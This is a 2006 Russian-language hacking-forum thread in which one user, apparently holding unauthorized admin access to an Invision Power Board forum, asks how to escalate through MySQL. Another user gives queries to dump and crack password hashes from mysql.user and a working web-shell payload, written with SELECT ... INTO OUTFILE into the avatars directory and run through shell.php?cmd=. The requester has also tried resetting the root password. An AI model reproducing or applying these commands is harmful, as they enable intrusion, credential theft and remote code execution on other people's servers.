ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Перезагрузить страницу Mysql vc Invision Power Board v1.1.2
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Mysql vc Invision Power Board v1.1.2
  #1  
Старый 15.07.2006, 21:28
add
Banned
Регистрация: 04.07.2006
Сообщений: 17
Провел на форуме:
86034

Репутация: 0
По умолчанию Mysql vc Invision Power Board v1.1.2
Скажите плиз камынды на Mysql просто я зашёл на форум под админом но не залить шелл через смайлы немогу в моем роспряжении тока Mysql через админку вот пример я делаю запрос :
SHOW OPEN TABLES
мне показует Базы кокие есть
а как например зделать так что бы я мог просмотреть
базу Mysql и в ней user просмотреть,я еще пытался делать так :
UPDATE mysql.user SET Password=PASSWORD('111') WHERE user='root'
Пишет что запрос выполнен успешно но я немогу подконектить с поролем "111"
что можете подсказать .
P/s:Зарание блогодарен!
 
Ответить с цитированием

  #2  
Старый 15.07.2006, 22:30
Driver
Познающий
Регистрация: 06.07.2006
Сообщений: 87
Провел на форуме:
464777

Репутация: 33
По умолчанию
Почитай маны по мусклю...
Какой User()?
Если с рут привелегиями, то шелл можно через запрос залить...
 
Ответить с цитированием

  #3  
Старый 15.07.2006, 22:37
add
Banned
Регистрация: 04.07.2006
Сообщений: 17
Провел на форуме:
86034

Репутация: 0
По умолчанию
Цитата:
Сообщение от Driver  
Почитай маны по мусклю...
Какой User()?
Если с рут привелегиями, то шелл можно через запрос залить...
да вроде с Рут привелегиями
 
Ответить с цитированием

  #4  
Старый 15.07.2006, 22:38
add
Banned
Регистрация: 04.07.2006
Сообщений: 17
Провел на форуме:
86034

Репутация: 0
По умолчанию
И хотелось-бы просмотреть базу mysql.user кокми запросом можно?
Последний раз редактировалось add; 15.07.2006 в 22:44..
 
Ответить с цитированием

  #5  
Старый 15.07.2006, 22:56
Driver
Познающий
Регистрация: 06.07.2006
Сообщений: 87
Провел на форуме:
464777

Репутация: 33
По умолчанию
SELECT user, password FROM mysql.user

для того что бы залить шелл - нужно знать путь к форуму... посмотри, там где то в админке в ипб по моему вписывать надо его, следовательно он должен там быть
а потом простенький запрос на заливку шелла...
P.S.: пассы в mysql.user зашифрованные... для расшифровки юзай passwords pro...
 
Ответить с цитированием

  #6  
Старый 15.07.2006, 22:57
add
Banned
Регистрация: 04.07.2006
Сообщений: 17
Провел на форуме:
86034

Репутация: 0
По умолчанию
Вот:
/usr/home/virtual/xxx/htdocs/forums/html/
 
Ответить с цитированием

  #7  
Старый 15.07.2006, 23:04
Driver
Познающий
Регистрация: 06.07.2006
Сообщений: 87
Провел на форуме:
464777

Репутация: 33
По умолчанию
SELECT '<?php system($_GET[cmd]); ?>' FROM mysql.user INTO OUTFILE '/usr/home/virtual/xxx/htdocs/forums/html/style_avatars/shell.php'

попробуй вот так...

потом иди к <forum path>./style_avatars/shell.php?cmd=ls

должно вывести список файлов в каталоге...
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Взлом форумов IPB (Invision Power Board) < 2.0.4 Ice_Fro$T Форумы 19 18.11.2006 09:19
SQL injection в MySql сервере версии 3,x bandera Чужие Статьи 3 04.06.2006 16:17
Защищаем MySql. Шаг за шагом k00p3r Чужие Статьи 0 13.06.2005 11:18



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ